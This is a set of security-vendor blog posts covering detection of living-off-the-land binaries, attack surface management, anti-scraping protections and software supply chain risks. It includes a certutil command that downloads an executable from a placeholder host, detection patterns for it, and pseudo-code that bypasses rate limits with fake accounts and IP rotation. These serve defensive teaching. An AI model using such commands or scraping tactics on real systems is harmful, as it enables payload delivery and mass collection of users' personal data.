
eSecurity Planet: Living Off the Land Attacks: LOTL Definition & Prevention

NetSPI Principal Consultant Derek Wilson is featured in eSecurity Planet, sharing insights on Living Off the Land (LOTL) attacks and how to prevent them. Read the preview below or find the full article at https://www.esecurityplanet.com/networks/living-off-the-land-attacks/.

+++

5 Best Practices for Preventing LOTL Attacks

The following strategies help your business not only prepare for LOTL attacks but also reduce threat actors’ opportunities to compromise your legitimate systems.

Use LOLBINS To Track Binary Activity

The Living off the Land Binaries, Scripts, and Libraries project (LOLBAS) offers a comprehensive list of exploits attackers use. It’s best to study one binary (LOLBIN) at a time, examining how the specific program is typically used. Once your team knows what appropriate usage looks like, you can begin identifying abnormal behavior from that program.
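As a concrete, purely illustrative example of this baselining approach, consider certutil, a LOLBIN that is legitimately used for certificate management but is documented in LOLBAS as abusable for downloading and decoding payloads. The sketch below flags command lines that deviate from baseline usage; the event source and patterns are assumptions you would replace with your own telemetry and tuning.

Example Detection Sketch:

import re

# Abusive certutil patterns drawn from LOLBAS-style documentation
# (illustrative only; real detections must be tuned against your own baseline).
SUSPICIOUS_CERTUTIL = [
    re.compile(r"-urlcache\b.*https?://", re.IGNORECASE),  # downloading a remote file
    re.compile(r"-decode\b", re.IGNORECASE),               # base64-decoding a payload
]

def is_abnormal_certutil(command_line):
    # Flag certutil invocations that deviate from typical certificate management.
    return any(p.search(command_line) for p in SUSPICIOUS_CERTUTIL)

# Hypothetical process events as (process_name, command_line) from an EDR/log pipeline.
events = [
    ("certutil.exe", "certutil -urlcache -split -f http://example.com/a.exe a.exe"),
    ("certutil.exe", "certutil -viewstore My"),
]
for name, cmdline in events:
    if name.lower() == "certutil.exe" and is_abnormal_certutil(cmdline):
        print("ALERT: abnormal certutil usage:", cmdline)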

Derek Wilson, principal consultant at security firm NetSPI, underscored the importance of using this resource. “By finding a way to baseline detections against something like the Living Off the Land Binaries And Scripts (LOLBAS) project, which is set up to track LOTL threats, teams can then build proactive detection plans for the procedures that aren’t caught,” he said.

Wilson recommended additional software to help teams develop general detection methods. “Breach and attack simulation (BAS) tools are invaluable in baselining detective controls and continuously improving detection of LOTL attacks,” he said. BAS tools give security teams insight into an attack lifecycle, behaving like a threat actor might to find security weaknesses more quickly.

You can read the full article here!


NetSPI Launches Software as a Service (SaaS) Security Assessment

Offensive security leader brings proactive security to Microsoft 365 and Salesforce environments, supporting discovery and remediation of SaaS vulnerabilities and misconfigurations.

Minneapolis, MN – July 25, 2023 — NetSPI, the global leader in offensive security, today unveiled its Software as a Service (SaaS) Security Assessment, bringing proactive security to Microsoft 365 and Salesforce environments. NetSPI’s SaaS Security Assessment leverages both automated and manual testing methods developed from years of industry-leading application and cloud assessments to discover and help remediate vulnerabilities and misconfigurations.  

SaaS applications play a critical role in attack surface expansion as businesses continue to increasingly depend on them for critical operations and data management. Yet, 81% of organizations have sensitive SaaS data exposed. Delivered on NetSPI’s Penetration Testing as a Service (PTaaS) platform, the SaaS Security Assessments include real-time reporting, remediation guidance, project management and communication, as well as the ability to track data and discover vulnerability trends.  

“SaaS security is imperative, but it’s often overlooked due to organizations’ false assumption that SaaS vendors will protect customer data and app usage – creating a major blind spot for security teams, and increased opportunity for malicious actors,” said Karl Fosaaen, Vice President of Research at NetSPI. “As the attack surface continues to evolve and expand, protecting SaaS apps must become an integral part of businesses’ security strategy. Our application and cloud pentesting expertise puts us ahead of the curve and brings unparalleled insights to the SaaS security market at a time when it’s needed most.” 

NetSPI’s SaaS Security Assessment addresses: 

  • Identity & Access Management – Ensuring only authorized users have access to SaaS applications 
  • Data Management – Protecting every form of data in an organization’s possession 
  • Data Storage – Protecting where data is stored 
  • Email Security – Protecting applications from unauthorized access through email account attack vectors
  • Account Protection – Maintaining account integrity and confidentiality 
  • Password Security – Ensuring password policies follow industry best practices 
  • Integrations – Validating the security of third-party integrations 

The service is currently being offered for Salesforce and Microsoft 365 in accordance with industry standards such as CIS Benchmarks, with additional security checks derived from NetSPI’s extensive experience in testing these environments. 

To learn more about NetSPI’s SaaS Security Assessments, or its comprehensive offensive security solutions, please visit www.netspi.com.

About NetSPI

NetSPI is the global leader in offensive security, delivering the most comprehensive suite of penetration testing, attack surface management, and breach and attack simulation solutions. Through a combination of technology innovation and human ingenuity, NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. Its global cybersecurity experts are committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, four of the top five leading cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers & e-commerce companies, and many of the Fortune 500. NetSPI is headquartered in Minneapolis, MN, with offices across the U.S., Canada, the UK, and India. Follow NetSPI on Facebook, Twitter, and LinkedIn.

Media Contacts:
Tori Norris, NetSPI
victoria.norris@netspi.com
(630) 258-0277

Jessica Bettencourt, Inkhouse for NetSPI
netspi@inkhouse.com
(774) 451-5142 


How to Select the Best Attack Surface Management Platform 

As companies’ attack surfaces continue to expand and threat actors remain relentless, attack surface management (ASM) has grown into a rapidly emerging category in the cybersecurity space. Rather than organizations manually inventorying and protecting critical assets on their own, attack surface management tools provide continuous visibility and risk assessment of a company’s entire attack surface.

Teams looking to improve their offensive security efforts have many attack surface management tools to choose from, but most only provide standard asset discovery – such as the use of off-the-shelf scanners – and lack prioritization of actionable remediation efforts, resulting in alert overload. 

We asked our team of attack surface management experts for their thoughts on which features security leaders should look for in ASM platforms to ensure they’re getting the best value and highest level of protection. The most effective attack surface management tools go beyond asset discovery by adding expert human analysis to prioritize alerts and remediation.


6 Must-Have Features in an Attack Surface Management Platform 

As you weigh the pros and cons of various attack surface management platforms and tools, consider the following must-have features. 

1. Ability to Comprehensively Discover the Unknown  

Many attack surface management tools can only discover known assets, such as IP addresses, domains, software, and other assets that the security team actively manages. However, finding and securing both known and unknown internet-facing assets is an essential capability for attack surface management tools.

Unknown assets are those the IT security team is unaware of, including unauthorized and unmanaged assets. These gaps in known assets have a variety of causes, including shadow IT, misconfigurations, failed decommissions, and more. They ultimately result in ineffective scan coverage and pentest scopes, leaving your attack surface unmonitored and presenting a risk to your organization.

When you leverage an attack surface management platform like NetSPI’s, ASM engagements start with a list of known domains and IPs. Next, the search expands to related entities to uncover all assets tied to a company – including unknown assets. The Dynamic FAQs feature in NetSPI’s attack surface management platform shows how many IPs were initially provided compared to how many public-facing assets were found.
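As a rough sketch of what seed expansion can look like in general (this illustrates the broad technique using the public crt.sh certificate transparency search, not NetSPI’s actual methodology), related hostnames can be harvested from certificates issued for a seed domain:

Example Discovery Sketch:

import requests

def expand_from_seed(domain):
    # Query certificate transparency logs for hostnames related to a seed domain.
    resp = requests.get(
        "https://crt.sh/",
        params={"q": f"%.{domain}", "output": "json"},
        timeout=30,
    )
    resp.raise_for_status()
    found = set()
    for entry in resp.json():
        for name in entry.get("name_value", "").splitlines():
            found.add(name.strip().lower())
    return found

seeds = ["example.com"]  # known domains provided at the start of an engagement
discovered = set()
for seed in seeds:
    discovered |= expand_from_seed(seed)
print(f"{len(seeds)} seed(s) expanded to {len(discovered)} candidate assets")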

2. Inclusion of Human Analysis to Prioritize Alerts  

Our 2023 Offensive Security Vision Report showed that a lack of resources and prioritization are two of the top barriers to greater offensive security. Helping security teams with data-driven prioritization of remediation efforts eases the burden of decision-making. 

Expert human analysis delivers the strongest cybersecurity results because pentesters provide context around alerts, so that only high-impact vulnerabilities generate alerts. Attack surface management tools that incorporate human analysis can leverage the team’s expertise to vet vulnerabilities before they’re added as alerts.

Manual pentesters review every exposure to contextualize it and determine whether it’s exploitable. This helps eliminate alert fatigue, drastically reduces the amount of work teams need to do, and enables teams to focus on meaningful remediation efforts.

As an example of this approach in practice, NetSPI provides a Signal Dashboard to distill signal from noise. This dashboard highlights all the activities of the ASM Operations Team, so clients can understand what’s happening behind the scenes even if they haven’t been alerted to new vulnerabilities in a while.

Signal Dashboard in NetSPI's PTaaS Platform, Resolve
In this ASM Signal Dashboard screenshot, the NetSPI ASM Operations Team has reviewed 1.21k assets, discovered 6.71k new assets, and reviewed 1 vulnerability, determining that no action is needed from the client’s team and eliminating the work they would otherwise have spent discovering, validating, or remediating.

3. Ability to Track Attack Surface Changes Over Time 

A key benefit of attack surface management is discovering attack surfaces that were previously unknown. A traditional approach to tracking attack surfaces has been manually tracking externally facing assets. However, because attack surfaces and threats can evolve and expand overnight, this approach isn’t enough to track changes and secure new attack surfaces that emerge throughout the year. 

Rather than only performing annual pentesting, relying on a combination of external network penetration testing and comprehensive, continuous attack surface management enables organizations to track expanding attack surfaces and find vulnerabilities as they arise. 

With the right attack surface management platform, once the initial report is complete and critical vulnerabilities have been addressed, the platform continues to evaluate a company’s entire attack surface on an ongoing basis.

This inventories new attack surfaces as they arise and shows all data in one user-friendly platform. 

4. Expertise to Develop New Features In-House Based on Customer Priorities 

As cyber threats evolve and persist, security solutions also need to adapt to protect against the latest attacks and align with customers’ business needs. For ASM vendors, working with customers is a two-way street that advances the technology’s capabilities.

The best attack surface management platform provider will listen to customers to help drive feature development and platform enhancements. Based on customer input, an in-house team of software engineers can update existing features and build new ones.

With NetSPI as an example, we released a Company Hierarchy Dashboard on our Attack Surface Management platform, a feature that was driven in part by customer requests. The dashboard visualizes the entire company, including all subsidiaries, divisions, and acquisitions, on one screen. It’s especially helpful for organizations that use ASM to get ahead of potential vulnerabilities that may come with mergers and acquisitions. Learn more about this dashboard on LinkedIn.

When you work with NetSPI, you get incredible value through our technology and expert team, and one of the greatest benefits is that we are continually improving our platform to add more value every time you log in. Interested in learning more about our latest updates? Read our release notes.

5. A Clean, Easy-to-Use UX 

As is the case with any product, software, or platform, attack surface management end users won’t settle for a poor user experience (UX) or a clunky product with too many clicks to get to a destination. User-friendly design, easy-to-digest dashboards, and training materials at the ready are essential for the best attack surface management tools. Some platforms even offer dark mode to suit anyone’s preferences.

Features and capabilities that go beyond attack surface management and into related market categories help organizations continue evolving and advancing their offensive security strategies. Partnering with a vendor like NetSPI that offers services beyond core ASM can help ensure you’re backed with the right mix of offensive security methods for your business.

Gartner’s matrix from the report “Competitive Landscape: External Attack Surface Management” shows service areas related to attack surface management.

Access the Most Important Attack Surface Management Features with NetSPI   

Asset discovery with attack surface management is table stakes, and the right vendors go far beyond this approach to provide the best possible offensive security solutions.

NetSPI’s attack surface management platform and solutions include human analysis to prioritize alerts, the ability to discover the unknown and track attack surface changes over time, capabilities to develop new features in-house, a user-friendly experience, and additional security services that go beyond ASM.

Want to hear about ASM from a third party? Gartner® provides recommendations on vendor capabilities in the report, Competitive Landscape: External Attack Surface Management. Take a look and then try our free Attack Surface Management Tool to search more than 800 million public records for potential attack surface exposures. 


Discover the Unknown with ASM Security for Attack Surface Reduction

As businesses scale, the number of employees, assets, and platforms continuously expand, giving adversaries many pathways to gain entry to networks and environments. To mitigate risks as the world becomes increasingly connected, prioritizing attack surface reduction is critical.

Attack surface management (ASM) results in attack surface reduction because it identifies unknown or vulnerable parts of an attack surface, allowing security teams to address these risks. Attack surface reduction, when aligned with business needs, decreases opportunities for threat actors to find and exploit an unmanaged or weak asset while enabling the business to grow securely.

Gain a Shared Understanding of Assets versus Exposures 

According to Forrester, attack surface management is defined as, “the process of continuously discovering, identifying, inventorying, and assessing the exposures of an entity’s IT asset estate.” Recognizing the difference between assets and exposures is an important part of ASM security.

Assets include IP addresses, domains, ASNs, and cloud accounts. When assets are unmanaged or unknown, they are a more susceptible target and at a higher risk for vulnerabilities.  

Exposures are risks that exist on assets and can also pose a cybersecurity risk for organizations. Exposures include open ports, SSL certificates, and vulnerabilities. 

The Difference Between Known versus Unknown Assets  

As businesses grow and adapt to change, their attack surface grows as well. Without proper asset tracking, this can increase the number of unknown external assets. 

Understanding the difference between known versus unknown assets, also sometimes referred to as managed versus unmanaged assets, can improve attack surface reduction. Known assets include IP addresses, domains, cloud accounts, ASNs, and other assets that the IT security team is aware of and actively manages. 

On the other hand, unknown assets include those that are unauthorized or unmanaged by the IT department, and thus can pose a significant risk to the business. Some challenges related to unknown assets include:  

  1. Shadow IT: Access to or use of technology, hardware, or software that is outside an organization’s security governance processes and unknown by the IT department—known as shadow IT—can lead to vulnerabilities and exposures. Examples of shadow IT include sharing work files to personal drives, email addresses, or cloud storage accounts.  
  2. Misconfigurations: Security teams are unable to accurately detect misconfigurations and other weaknesses present in unknown assets, which increases the risk of breaches and other attacks.  
  3. Ineffective scan coverage: When assets are unknown, organizations can’t effectively prioritize scan results to detect and remediate vulnerabilities.  

3 Tactics to Support Attack Surface Reduction with ASM Security 

1. Prioritize attack surface mapping  

Attack surface mapping, part of any strong ASM security strategy, means identifying all assets and the total scope of an organization’s attack surface, cataloging potential exposures, and building a plan to prioritize and remediate risks. Mapping involves continuous attack surface discovery, which inventories all existing attack surfaces, including both known and unknown assets.

With a full understanding of the total attack surface scope, an organization can perform an attack surface assessment, which scans known business domains and IP addresses to identify threats and vulnerabilities. The key to effective attack surface assessments is pairing data analysis with expert human evaluation to ensure alerts are prioritized based on the overall risk to an organization.  

2. Continuously manage attack surfaces 

With traditional approaches to cybersecurity, many organizations complete manual penetration testing once or a few times a year to keep up with compliance regulations. However, new external assets can come into ownership overnight, and threat actors are increasingly sophisticated in their methods of attack, meaning an annual pentest, while valuable, isn’t enough to protect against emerging threats.  

Instead, ASM security that includes continuous monitoring and evaluation keeps attack surface sprawl in check and helps organizations avoid giving adversaries the opportunity to find new attack surfaces and risky exposures. Assessing and managing your attack surface, including new cloud assets, on a consistent basis using a combination of external network penetration testing and an attack surface management platform, can help your team stay ahead of the latest threats. 


3. Deactivate unused assets or attack surfaces 

Unused assets unnecessarily expand attack surface sprawl, increasing the number of assets that can fall victim to vulnerabilities. Examples of unused assets include infrastructure that was scheduled for decommissioning but never decommissioned, untracked asset remnants from mergers and acquisitions, and assets that are simply no longer actively used.

To achieve attack surface reduction, partner closely with a cybersecurity team or attack surface management vendor to evaluate assets or attack surfaces that can be deactivated.  

Improve ASM Security with NetSPI’s Free Attack Surface Management Tool  

Comprehensive ASM security can help your business identify and manage attack surfaces to improve attack surface reduction. To ensure your ASM security is as effective as possible, leverage an attack surface management platform like NetSPI, which pairs human expertise with advanced software and data analysis. This helps your business prioritize the results of attack surface management analysis for the highest level of protection and best ROI on cybersecurity investments. 

Test drive NetSPI’s free attack surface management tool to detect and protect both known and unknown assets. After all, you can’t manage assets you don’t know about.


Anti-Scraping Part 2: Implementing Protections

Continuing our series on Anti-Scraping techniques, this blog covers implementation of Anti-Scraping protections in a fake message board and examination of how scrapers can adapt to these changes.

While completely preventing scraping is likely impossible, implementing a defense in depth strategy can significantly increase the time and effort required to scrape an application. Give the first blog in this series a read, Anti-Scraping Part 1: Core Principles to Deter Scraping, and then continue on with how implementing these core principles affects scrapers’ ability to exfiltrate data.

Hardening the Application

Multiple changes have been made to the Fake Message Board site to try and prevent scraping. The first major change is that rate limiting has been enforced throughout the application. Previously, the search bar had a “limit” parameter with no maximum enforced value which allowed all users of the application to be scraped in only a few requests. Now the “limit” parameter has a maximum enforced value of 100. All error messages have been converted to generic messages that do not leak information. 

Not all the recommended changes have been applied to the application. Account creation has still not been locked down. Additionally, the /search endpoint still does not require authentication. As illustrated in “The Scraper’s Response” section, these gaps undermine most of the “fixes” made to the application. 

Implementing Rate Limiting 

There are many design decisions that need to be made when implementing rate limits. Here are some of the considerations: 

  1. Should rate limits be specific to endpoints or constant across the application? 
  2. How many requests should be allowed per unit of time? (e.g., 100 requests/second) 
  3. What are the consequences of reaching a rate limit?

Additionally, there is a distinction between logged-in and logged-out rate limits. Logged-in rate limits are applied to user sessions. When scrapers create fake accounts and use them for scraping, logged-in rate limits can suspend or block those accounts. If creating fake accounts is difficult, then this can significantly hinder a scraper’s progress. Logged-out rate limits are applied to endpoints where having an account isn’t required. From a defensive perspective, there are limited signals that can be used when a scraper is logged-out. The most common signal is an IP address. There are additional signals such as user-agent, cookies, additional HTTP headers, and even TCP fields. In the next sections we’ll review how the Fake Message Board application implemented both logged-in and logged-out rate limits. 

Logged-in Rate Limits

In this case the logged-in rate limits are applied across the application. This probably isn’t the best decision for most organizations, but it is the easiest to implement. Each user is allowed to send 1000 requests/minute, 5000 requests/hour, and 10,000 requests/day. If a user violates any of those rate limits, then they receive a strike. If a user receives 3 strikes, then they are blocked from the platform. Implementing an unforgiving strategy like this is probably too strict for most applications.  
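A minimal sketch of such a strike-based limiter is below. It is in-memory and single-process purely for illustration; a production deployment would track counters in shared storage such as Redis.

Example Rate Limiter Sketch:

import time
from collections import defaultdict, deque

LIMITS = [(60, 1000), (3600, 5000), (86400, 10000)]  # (window in seconds, max requests)
MAX_STRIKES = 3

timestamps = defaultdict(deque)  # user_id -> recent request times
strikes = defaultdict(int)
blocked = set()

def allow_request(user_id):
    if user_id in blocked:
        return False
    now = time.time()
    q = timestamps[user_id]
    q.append(now)
    while q and now - q[0] > 86400:  # keep only the largest window's worth of history
        q.popleft()
    for window, limit in LIMITS:
        if sum(1 for t in q if now - t <= window) > limit:
            strikes[user_id] += 1
            if strikes[user_id] >= MAX_STRIKES:
                blocked.add(user_id)  # third strike: block the account
            return False
    return True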

Determining the number of requests allowed per unit of time is a very difficult problem. The last thing we want is to impact legitimate users of the application. Analyzing traffic logs to see how many requests the average user is sending will be critical to this process. When viewing the users sending the most traffic, it may be difficult to distinguish authentic traffic from users misusing the platform via automation. This will more than likely require manual investigations and extensive testing in pre-production environments.

It is also worth noting that bugs in applications can result in requests being repeatedly sent on the user’s behalf without their knowledge. Punishing these users with rate limits would be a huge mistake. If a user is sending a large number of requests to the same endpoint and the data returned isn’t changing, then it seems more likely that this is a bug in the application as opposed to scraping behavior.

Logged-out Rate Limits

In this case the logged-out rate limits are also applied across the application. Each IP address is allowed to send 1000 requests/minute, 5000 requests/hour, and 10,000 requests/day. If an IP address violates any of those rate limits, then it receives a strike. If the IP receives 3 strikes, then it’s blocked from the platform. This isn’t a realistic solution for multiple reasons, but the primary one is that some IP addresses are shared by multiple users, such as public WiFi or university IPs. In those cases, the IPs would be blocked unfairly.

One of the main weaknesses of logged-out rate limits is that almost every signal can be controlled by the scraper. For example, the scraper can change their user agent with every request. If that signal is used in isolation, then you’ll just see a small number of requests from a bunch of different user agents. Similarly, a scraper can rotate their IP address. This is a devastating technique from a defensive perspective because our most reliable signal is the IP address, and there are multiple open source libraries that make rotating IP addresses trivial. Implementing effective logged-out rate limits will probably require combining several of these signals in sophisticated ways.
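One way to combine signals, sketched below under the assumption that the strike-based limiter from the previous section is available as allow_request(): derive several independent rate-limiting keys per request and deny the request if any key trips its limit, so rotating a single signal (say, the user agent) no longer resets the scraper’s budget.

Example Signal Combination Sketch:

def request_keys(ip, user_agent, session_cookie):
    # Each logged-out signal becomes its own rate-limiting key.
    return [f"ip:{ip}", f"ua:{user_agent}", f"cookie:{session_cookie}"]

def allow_logged_out_request(ip, user_agent, session_cookie):
    # Deny the request if ANY key has exceeded its limit, so a scraper
    # must rotate every signal together to appear as distinct clients.
    return all(allow_request(key) for key in request_keys(ip, user_agent, session_cookie))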

Enforcing Data Limits 

Ensuring that there’s a maximum limit to the amount of data that can be returned per response is a crucial piece in the fight against scraping. Previously, the search bar had a “limit” parameter which could return hundreds of thousands of users in one response. Now only up to 100 users can be returned per response. If more than 100 users are requested, then an error message is returned as shown below. 

HTTP Request:

POST /search?limit=101 HTTP/1.1
Host: 127.0.0.1:12345
[TRUNCATED] 

{"input":"t"}

HTTP Response:

HTTP/1.0 400 Bad Request 
[TRUNCATED] 

{"error":"error"}

Return Generic Error Messages 

Previously the forgot password and create account workflows leaked information useful to scrapers via error messages. The forgot password workflow used to reveal whether the provided username matched an existing account and would return the email address if it did. Now it always returns the same message, “If the account exists an email has been sent.” 

HTTP Request:

POST /forgotPassword HTTP/1.1
Host: 127.0.0.1:12345 
[TRUNCATED]

username=doesnotexist

HTTP Response:

HTTP/1.0 200 OK 
[TRUNCATED] 

{"message":"if the account exists an email has been sent"}

The create account workflow used to reveal whether a specific username, email address, or phone number was already taken. Now it always returns the message, “If the account was created an email has been sent.” 

HTTP Request:

POST /createAccount HTTP/1.1 
Host: 127.0.0.1:12345 
[TRUNCATED] 

username=vfoster166&email=test@test.com&phone=&password=[REDACTED]

HTTP Response:

HTTP/1.0 200 OK 
[TRUNCATED] 

{"response":"if the account was created an email has been sent"}

The Scraper’s Response 

Since the application has been updated, let’s review each piece of functionality and figure out how we can bypass the protections: 

  1. Recommended Posts Functionality: Requires authentication, and rate limits your account after 1,000 requests.  
  2. Search Bar: Does not require authentication, returns 100 users/response, and rate limits your IP address after 1,000 requests. 
  3. User Profile Pages: Requires authentication and rate limits your account after 1,000 requests. 
  4. Account Creation: No longer useful for leaking data, but fake accounts can be made easily. 
  5. Forgot Password: No longer useful for leaking data.

Overall, the application has had multiple improvements since the previous scrape in Part 1. The introduction of rate limits forces us to adapt our techniques. For logged-in scraping, the tactic will be to rotate sessions: since we’re able to easily make many fake accounts, we will send a small number of requests from each account and as a result never get rate limited. For logged-out scraping, the tactic will be to rotate IP addresses. By only sending a few requests from each IP address, we will hopefully never get rate limited.

Logged-In Scraping 

The goal is to extract all 500,000 users using either the recommended posts functionality or user profile pages. Since user profile pages return more data about the user (ID, name, username, email, birthday, phone number, posts, etc…) let’s focus on that endpoint. Assuming we only get one user per response, each of our fake accounts can send 999 requests/minute without being rate limited. If we make 500 fake accounts, then each account will only have to send ~999 requests in order to scrape every user on the platform. This means in only a couple minutes every user can be scraped and no rate limiting will be encountered. 

Pseudo Scraper Code:

user_id_counter = 1  # user IDs start at 1 and are sequential
fake_accounts = [session1, session2, …, session500]  # list of session cookies for all the fake accounts

while user_id_counter < 500_000:  # go through all 500,000 users
    for session in fake_accounts:  # rotate your session with every request
        user_data = session.get("/profile/" + str(user_id_counter))
        user_id_counter += 1

Logged-Out Scraping 

Extracting all 500,000 users using the search functionality is not as easy as it was last time. Now only 100 users are returned per response. Since each IP address can send 999 requests/minute without being rate limited, each IP can scrape 99,900 users without being blocked. This means only a few IP addresses are required. Most IP rotation tools leverage tens of thousands of IPs so getting a few is not an issue. 

Pseudo Scraper Code:

while users_scraped < 500_000:
    # route each request through an IP rotation service so no single IP hits the rate limit
    user_data = requests.post("/search?limit=100", json=random_search_string, proxies=ip_rotation_proxies)

Summary

With multiple protections in place, scraping all 500,000 fake users of the application in a few minutes is still pretty easy. As a quick recap, our five core principles of Anti-Scraping are: 

  1. Require Authentication 
  2. Enforce Rate Limits 
  3. Lock Down Account Creation 
  4. Enforce Data Limits 
  5. Return Generic Error Messages

As demonstrated in this blog, failing to implement one of these principles can completely undermine protections implemented in the others. Although this application enforced rate limits, data limits, and returned generic error messages, by not enforcing authentication and by allowing fake accounts to easily be created, the other protections barely hindered the scraper. 

Additional Protections

There are several additional Anti-Scraping techniques that are worth bringing to your attention before wrapping up.  

  • When locking down account creation, implementing CAPTCHAs is a critical step in the right direction.  
  • Requiring the user to provide a phone number can be a gigantic annoyance to scrapers. If there’s a limit on the number of accounts per phone number, and virtual phone numbers are blocked, then it’s much more difficult to create fake accounts at scale. 
  • If user data is being returned in HTML, then adding randomness to the responses is another great deterrent. By changing the number and type of HTML tags around the user data, without affecting the UI, it becomes significantly harder to parse the data (see the sketch after this list). 
  • On the rate limiting front, make sure to apply rate limits to the user as opposed to the user’s session. If rate limits are applied to the session, then a scraper can just log out and log back in which grants them a new session and thus bypasses the rate limit.  
  • For logged-out rate limits, blocking certain IP ranges, such as TOR exit nodes or proxy/VPN providers, may make a lot of sense, especially if the majority of that traffic is inauthentic. Each organization that owns ranges of IP addresses is assigned autonomous system numbers (ASNs), and there are several publicly available ASN-to-IP-range tools/APIs that may be very useful in these cases.
  • Lastly, user IDs should not be generated sequentially. A lot of scrapes first require a list of user IDs. If they are hard to guess and there isn’t an easy way to collect a large list of them then this can also significantly slow down a scraper. 
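As a quick sketch of the HTML-randomization and non-sequential-ID ideas from the list above (the nesting depth and class names are arbitrary; only inline, style-neutral span tags are used so the UI is unaffected):

Example Randomization Sketch:

import random
import uuid

def randomized_wrapper(value):
    # Wrap a field in a random depth of spans with random class names so a
    # scraper can't rely on a fixed CSS selector or tag structure to parse it.
    html = value
    for _ in range(random.randint(1, 3)):
        html = f'<span class="{uuid.uuid4().hex[:8]}">{html}</span>'
    return html

new_user_id = str(uuid.uuid4())  # random user IDs instead of guessable sequential integers
print(randomized_wrapper("vfoster166"))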

Conclusion 

Hopefully some of the Anti-Scraping tactics and techniques shared in this series were useful to you. Although completely preventing scraping probably isn’t possible, implementing a defense in depth approach that follows our five core principles of Anti-Scraping will go a long way toward deterring scrapers and wasting their time.


3 Software Supply Chain Risks in 2023

Over the last two years, the software supply chain has become one of the most pressing and relevant security issues for organisations. In 2022, the number and severity of the attacks increased with no signs of slowing down. The majority of these attacks fell into one of three categories: package manager attacks, developer compromise, or large software vendor breaches. In this post, we will explore each of these and how you can defend against them. 

Package Managers 

Package managers have been of increasing interest to hackers over the past few years, with attacks against the packages fundamental to so much of our software. Not only this, but there has been an upward trend of attacks against the managers themselves, and the security track record of managers such as PyPI, Maven, and npm (the most popular) leaves a lot to be desired. Research like dependency confusion showed how they could be leveraged to attack some of the largest organisations in the world.

ReversingLabs, a company focused on threat hunting and supply chain security, has released a report specifically looking at attacks against package management software. It has seen a continual increase in known vulnerabilities in this software, up nearly 300% in the last four years. This includes attacks where malicious packages masquerade as reputable ones, and attacks against additional security measures such as MFA. See Aqua’s articles on the subject for more detail.

Npm in particular seems to be a target for attackers, given it is by far the largest package manager with over 1.3 million packages. Nearly 7000 packages in npm were identified as malicious in 2022, up from nearly 5000 in 2021. These malicious packages often exploit human error to get installed via typosquatting. This extremely simple technique has shown that supply chain attacks are not exclusive to advanced hacker groups; bored teenagers carry them out as well.
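As a simple illustration of catching a typosquat before installation, a requested package name can be compared against a list of popular packages by edit distance (the popular-package list below is a tiny stand-in):

Example Typosquat Check Sketch:

def edit_distance(a, b):
    # Classic Levenshtein distance computed with a single rolling row.
    dp = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        prev, dp[0] = dp[0], i
        for j, cb in enumerate(b, 1):
            prev, dp[j] = dp[j], min(dp[j] + 1, dp[j - 1] + 1, prev + (ca != cb))
    return dp[-1]

POPULAR = ["requests", "urllib3", "numpy", "pandas", "lodash", "express"]  # stand-in list

def looks_like_typosquat(name):
    # Close to a popular name, but not an exact match, is suspicious.
    return any(0 < edit_distance(name.lower(), p) <= 2 for p in POPULAR)

print(looks_like_typosquat("requets"))   # True: one edit away from "requests"
print(looks_like_typosquat("requests"))  # False: exact match is the real package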

What can be done to reduce the risk of package managers? The responsibility lies both with organisations and the repositories themselves. 

A double-edged sword with package managers is the lack of vetting. Anyone can create a package, which means we can draw on the amazing pool of developers from around the world. But this also means threat actors can create and distribute their malicious code. None of the top five package managers reviews its code, and the sheer size of the managers means that moving to a review system would be complex, expensive, and slow. This article by duncanlock, Supply Chain Attacks & Package Managers – a Solution?, has done the math.

If Debian (the largest vetted repository) needs 240 maintainers, something on the scale of PyPI (only the third largest repository) would need nearly 1000. This opens the door for actors to target unvetted package managers with the assurance they are unlikely to be caught.

An alternative may be for an organisation to vet its own libraries and host them in an offline or private mirror. This will combat legitimate packages turned malicious, or any accidental imports that could lead to typosquatting attacks. As with anything, there are some drawbacks: development time may be slowed, and the vetting will cost money. A reasonable first step would be to use private repositories and then vet the libraries from most to least critical to your development.
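A minimal sketch of the vetting idea is below: a CI step that refuses to install anything outside an internally reviewed allowlist. The file names and the pinned "name==version" format are assumptions.

Example Vetting Sketch:

def load_allowlist(path="vetted_packages.txt"):
    # One reviewed "name==version" pin per line, maintained by the security team.
    with open(path) as f:
        return {line.strip() for line in f if line.strip() and not line.startswith("#")}

def check_requirements(req_path="requirements.txt"):
    allowlist = load_allowlist()
    with open(req_path) as f:
        violations = [
            line.strip() for line in f
            if line.strip() and not line.startswith("#") and line.strip() not in allowlist
        ]
    if violations:
        raise SystemExit(f"Unvetted dependencies, review before install: {violations}")

check_requirements()  # run in CI before `pip install -r requirements.txt`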

For certain software products in your inventory, it can be difficult to know their secure development practices and you may be greatly increasing your risk of compromise via a third party. To combat this, some organisations will provide a software bill of materials. This should be a list of all software components used in a software product, making it easier to understand your attack surface and manage it accordingly.
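For example, a CycloneDX-style SBOM is structured JSON, so a consumer can inventory a vendor’s components in a few lines (sbom.json is a placeholder filename):

Example SBOM Sketch:

import json

with open("sbom.json") as f:  # a CycloneDX-format SBOM supplied by the vendor
    sbom = json.load(f)

# CycloneDX lists each software component with at least a name and version.
for component in sbom.get("components", []):
    print(component.get("name"), component.get("version"), component.get("purl", ""))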


Developers 

One of the most vulnerable elements of the supply chain is developers. As we saw with typosquatting, human error is often the entry point for attacks. Some developers also implement little to no security best practices, understandably so, because they create and maintain packages in their spare time as a hobby. There may also be only a single developer hosting hundreds of packages that have millions of downloads. This single point of failure quickly becomes a prime target in supply chain attacks.

Developer bad practice led to numerous compromised libraries in 2022. One such example affected three million users: a developer let a domain hosting a library expire, and a deleted username was quickly claimed by an attacker, who was then able to make changes to the library. Both of these attacks were unofficially attributed to a university student, perfectly illustrating that supply chain attacks are no longer exclusive to nation-state groups (as with SolarWinds).

Sometimes, the developers themselves may turn malicious. There have been recent incidents of disgruntled developers disrupting the supply chain. A “hacktivist” developer recently corrupted two projects they owned: faker.js and colors.js. These had 2.5 million and 22.4 million weekly downloads respectively. This example perfectly outlines the inherent risk of using and relying on third-party code.

The responsibility does not entirely fall on the developers; the package managers and code repositories also share it. A lot of these attacks could have been prevented by using MFA, something that, shockingly, wasn’t enforced for “critical” developer accounts. However, the likes of GitHub have begun to make security decisions on behalf of developers, like enforcing MFA for important developer accounts.

